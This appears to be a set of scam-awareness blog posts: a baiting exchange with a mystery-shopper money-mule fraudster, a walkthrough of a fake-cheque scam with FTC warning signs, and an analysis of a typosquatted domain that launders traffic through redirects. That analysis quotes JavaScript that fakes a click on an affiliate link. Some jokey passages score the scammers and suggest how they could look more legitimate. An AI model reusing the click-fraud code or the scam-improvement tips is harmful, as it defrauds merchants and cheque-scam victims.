The interesting thing about money laundering through money mules is that the scammer is the one that has to do the trusting. Instead of withdrawing the amount allocated to me the mule for my services as a Mystery Shopper, I could just cash the check 100% and then do nothing.

There’s enough money being stolen online that I would not be surprised to hear of people making a living doing exactly that.

Fraudster Chit-Chat

On the chance that this may be a money laundering scam, I thought I would have some fun with this fraudster. So I decided to email him (using the contact address posted to me) and let him know that I was having some problems. Enter Jayster the pot-smoking hippie:

 

To: sssshopperwilson <sssshopperwilson@aol.com>
Sent: Thu, Feb 14, 2013 5:59 am
Subject: Secret Shopper Check Received!

Got your check. Thanks bro! Took my ride to the shop and added
new rims, 22’s lookin real mean and shiny! Oh yeah my old 
lady was bitchin about child payments so I had to take care of
that too, it’s the law. So I am $1200 shy of the $1730 I owe you. 

Okay if I make it up next time?

Jayster

Yet another name enters the picture as the fraudster promptly replies

From: Markus Wilson [mailto:sssshopperwilson@aol.com] 
Sent: Thursday, February 14, 2013 7:28 AM
To: 
Subject: Re: Secret Shopper Check Received!

Follow the instruction and get Assignment done!

Markus Wilson

+1 point to the fraudster for being strictly about business. He stopped responding when I tried to get him to acknowledge that I had spent most of the money, and now “owed” him even less..

Sent: Thursday, February 14, 2013 3:00 PM
To: 'Markus Wilson'
Subject: RE: Secret Shopper Check Received!

Cool bro. We’re kicking it on the 22s, smoking a bud or two 
by the beach. 

Assignment done by weekend then I send you $250 cuz I already 
spent a little extra again ;) 

K bro?

We have discussed typosquatting enough to know that it is most definitely not a solved problem.

Today’s example brings nothing new to the table, but it’s interesting nonetheless. Type orbuitz.com (a fat-fingered typo of orbitz.com) into your browser and you will be redirected through to orbitz.com via an affiliate link (Google Affiliate Network pubid=21000000000018829). Since the Google Affiliate Network is involved, this typosquatter will be paid a commission in the event that the user who typed in orbuitz.com makes a purchase from orbitz.com.

The typosquatter in this scenario may insist that he is providing a service to Orbitz

“Hey I’m just helping users who made a mistake get to your site!”

You and I know that’s absolute drivel. Had the typosquatter not registered the domain, then any modern browser would have detected that it does not exist and sent that off as a query to a popular search engine, resulting in organic traffic flowing as it rightfully should through to the merchant. The traffic belongs to the merchant. The traffic should not have to be paid for. End of story.

Does Orbitz have a relationship with this Typosquatter?

The surprising part about this little example is that Orbitz probably does have a relationship with this typosquatter.

What are you talking about?!

Orbitz (the merchant) probably sees great conversions from the typosquatter (an affiliate), so they don’t question the source of the traffic. They don’t have any reason to do so, you see, for the typosquatter is laundering the traffic before sending it through to Orbitz. Shock!

Using this packet log as a reference, here’s how this works:

  1. User enters orbuitz.com into the browser
  2. This 302 redirects to http://www.linkcounter.com/go.php?linkid=297379
  3. Linkcounter.com then 302 redirects to http://www.e-o-k.com/otbr.htm
  4. JavaScript on the e-o-k.com page waits half a second and then fakes a click on an Orbitz affiliate link!
function link()
{
  setTimeout("document.getElementById('mylink').click()",500);
}

The net result is that Orbitz is seeing the traffic come from e-o-k.com and not the typosquatter domain.

I give this typosquatter a 2/10

  • 1 point for basic typosquatting
  • 1 point for laundering the click through e-o-k.com

Oh my, what a bad score. Lots of room for improvement here!

It’s always surprising to me just how popular the Mystery Shopper scam is. If you’re a chap that has stumbled upon this site because you are investigating what this Mystery Shopper offer you’ve recently received is all about, know this: don’t take a chance, it’s probably a scam!

From an earlier post, we already know that the Mystery Shopper scam can be broken up into four parts:

  1. Scammer Baits a Victim
  2. Scammer Verifies the Victim’s Details
  3. Scammer Priority Mails the Victim a Check. Upon reflection, I think this part should really be renamed to “Scammer Gains the Victim’s Trust”.
  4. Victim Indirectly Sends the Scammer a Check in Return

I recently “fell victim” to yet another scammer in the Mystery Shopper Scam. It’s funny to write about, but it’s not so funny when one considers that real people lose real money on this nonsense all of the time.

In this scam, the scammer followed the classic four pronged attack from above. Here’s what happened:

1. Scammer Baits a Victim

On a mailbox that does not exist, I received the following spam email:

From: Thomas Pelot [mailto:thomaspelot@icloud.com] 
Sent: Wednesday, January 23, 2013 6:34 PM
Subject: Approved: Retail Supervisor

Good Evening,

My name is Thomas Pelot, Hiring & Evaluation Consultant for BP 
Outsourcing LLC. We received your application in response to 
our Email campaign for mystery shoppers in your area. I am writing
 to congratulate you, as you have been selected as our newest 
shopper. You have been shortlisted to participate in our forth 
coming survey evaluation. It is our hope, that your addition to 
the fold will bring another edge and an heightened perspective 
to our surveys in your local city.

I will be contacting you tomorrow with more details on the position. 

Please write back as soon as you read this, to acknowledge receipt.

Thomas Pelot
mysterysupport@me.com
Hiring & Evaluation Consultant
BP Outsourcing LLC
Please find our webpage: WWW.BPOUTSOURCINGLLC.COM

I replied with

Sent: Wednesday, January 30, 2013 12:57 PM
To: 'mysterysupport@me.com'
Subject: RE: Approved: Retail Supervisor

This is such good timing. Thank you thank you!

What do you need from me?

2. Scammer Verifies the Victim’s Details

Shortly after my first reply, the scammer and I had a short e-mail exchange where he asked me for a valid physical address and telephone number that I could be contacted on (which he checked via a quick call!)

3. Scammer Gains the Victim’s Trust

A few days later I received a priority parcel in the mail

The contents of this parcel are a little more interesting than the previous scam we discussed. Instead of one check he sent us two. Remember, he sends us fake checks that look genuine so as to gain our trust; note that these are Postal Money Orders from USPS (very official looking).

mystery shopper scam

Of greater interest than the checks, is that he sent us a cover letter! mystery shopper scam

mystery shopper scam

The cover letter is a good idea and quite different to what the other scammers are getting up to. Four features in it are quite a nice touch:

  • I liked the fact that he carefully explains how much I will be paid and for what (the remainder going off to the Philippines)
  • He makes reference to an external company (bpoutsourcingllc.com). Of course, this could be a totally legitimate company and both this company and the victim would be none the wiser of what’s going on (unless the victim was disciplined enough to double check things).  Otherwise there’s absolutely nothing stopping the victim from saying he is affiliated with X Y or Z. Nice one scammer.
  • The scammer is available for support and questions. How wonderful! I tried to give him a call to ask him some questions but he is no longer picking up his phone.
  • The last statement in this cover letter is real classy: “Remember, you’re a mystery shopper. You are expressly forbidden to disclose this information to anyone.”

4. Victim Indirectly Sends the Scammer a Check in Return

So he gains our trust by sending us an upfront payment (and more) for services that have yet to be rendered. Call it Terms – 15 (unheard of!). The scam comes in when we deposit the fake money and before waiting for the checks to clear, we rush off to wire our own money to the scammer in the Philippines. A few days later we find out that the checks were fake and did not clear (but our own money has already been sent and received by the scammer)

How not to fall victim to this scam ?

Straight from the FTC’s writeup on the Mystery Shopper scam,  don’t do business with mystery shopping promoters who:

  • Advertise for mystery shoppers in a newspaper’s ‘help wanted’ section or by email
  • Require that you pay for “certification.”
  • Guarantee a job as a mystery shopper
  • Charge a fee for access to mystery shopping opportunities
  • Sell directories of companies that hire mystery shoppers
  • Ask you to deposit a check and wire some or all of the money to someone

How to rate this scammer?

This scammer falls short in a few areas. I think he could have done a lot more work when it comes to reducing the number of people involved in the scam. If I was an old Grandpa this is one of the things I would probably be suspicious of:

  • I originally received an email from Thomas Pelot
  • The Fedex parcel came from John Timpandis
  • The checks were signed by William Hinson
  • The money order was supposed to be wired to Erin Dubois

I know that money laundering is probably the reason why these other folks are involved (some of which could be innocent victims themselves), but I think the scammer would look more legitimate if he reduced the number of people to just one person.

Adding the phone number and contact details was a good idea, but he should have picked up when I called. So much nicer to chat to a real person when my money is being stolen from me.

Bottom line: this Mystery Shopper scammer gets a 4/10

  • +1 for basic mystery shopper scam
  • +1 for calling me to validate my details
  • +1 for USPS Postal Money Order
  • +2 for a cover letter with details and support details. I really liked this.
  • -1 for not picking up his phone